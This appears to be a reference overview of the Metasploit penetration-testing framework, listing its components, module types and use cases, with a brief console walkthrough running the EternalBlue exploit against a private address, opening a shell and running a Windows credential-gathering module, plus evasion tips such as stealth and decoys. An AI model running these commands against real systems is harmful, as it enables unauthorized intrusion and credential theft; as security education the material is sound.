Metasploit is an exploitation framework that provides tools for penetration testing and exploit development.

What is Metasploit?

Metasploit is an open-source framework that provides tools for penetration testing, exploit development and security research.

Components

Framework Core

  • Exploits: Modules that trigger a specific vulnerability on a target
  • Payloads: Code that runs on the target once an exploit succeeds (for example a command shell or Meterpreter)
  • Auxiliaries: Non-exploit modules such as scanners, fuzzers and sniffers
  • Encoders: Modules that re-encode a payload, for example to avoid bad characters

Metasploit Pro

  • Web interface: Browser-based interface
  • Automation: Task automation
  • Reports: Advanced reporting
  • Integration: Integration with other tools

Metasploit Community

  • Free version: No-cost edition
  • Basic features: Core feature set
  • Community: Community-based support
  • Documentation: Complete documentation

Features

Exploitation

  • Exploits: Vulnerability exploitation
  • Payloads: Payload delivery and session handling
  • Post-exploitation: Actions on a compromised host after a successful exploit
  • Pivoting: Routing traffic through a compromised host to reach further networks

Development

  • Exploit development: Exploit creation
  • Payload development: Payload creation
  • Testing: Exploit testing
  • Debugging: Code debugging

Automation

  • Scripts: Resource scripts that replay console commands
  • Workflows: Repeatable workflows
  • Batch processing: Running modules against many targets in one pass
  • Scheduling: Task scheduling

Basic Usage

Starting Metasploit

# Start Metasploit
msfconsole

# View available commands
help

# Search exploit modules (type: filters by module type)
search type:exploit

# Search payload modules
search type:payload

Exploitation

# Select exploit
use exploit/windows/smb/ms17_010_eternalblue

# Configure options
set RHOSTS 192.168.1.100
set LHOST 192.168.1.1

# Execute exploit
exploit

Post-exploitation

# The following commands run inside a Meterpreter session

# View system information
sysinfo

# Drop to an OS command shell on the target
shell

# Run a post-exploitation module (post modules are started with 'run'; 'load' is for Meterpreter extensions)
run post/windows/gather/credentials

Modules

Exploits

  • Windows: Windows exploits
  • Linux: Linux exploits
  • Web: Web application exploits
  • Mobile: Mobile device exploits

Payloads

  • Shell: Plain command shells
  • Meterpreter: Advanced in-memory payload with an extensible command set
  • Bind: Payloads that listen on the target and wait for an inbound connection
  • Reverse: Payloads that connect back from the target to the listener (LHOST)

Auxiliaries

  • Scanners: Network and service scanners
  • Fuzzers: Application fuzzers
  • Spoofers: Protocol spoofing modules
  • Sniffers: Traffic capture modules

Use Cases

Penetration Testing

  • Reconnaissance: Information gathering phase
  • Scanning: Target scanning
  • Exploitation: Vulnerability exploitation
  • Post-exploitation: Actions after initial access

Red Team

  • Simulation: Attack simulation
  • Evaluation: Defense evaluation
  • Training: Team training
  • Research: Security research

Development

  • Exploit development: Exploit creation
  • Testing: Security testing
  • Research: Vulnerability research
  • Education: Security education

Best Practices

Ethical Use

  • Authorization: Obtain written authorization before testing
  • Scope: Define the testing scope
  • Documentation: Document all activities
  • Responsibility: Take responsibility for the actions performed

Techniques

  • Stealth: Use stealth techniques
  • Timing: Adjust attack timing
  • Fragmentation: Use fragmentation
  • Decoy: Use decoys

Analysis

  • Results: Analyze results
  • False Positives: Identify false positives
  • Correlation: Correlate with other data
  • Documentation: Document findings
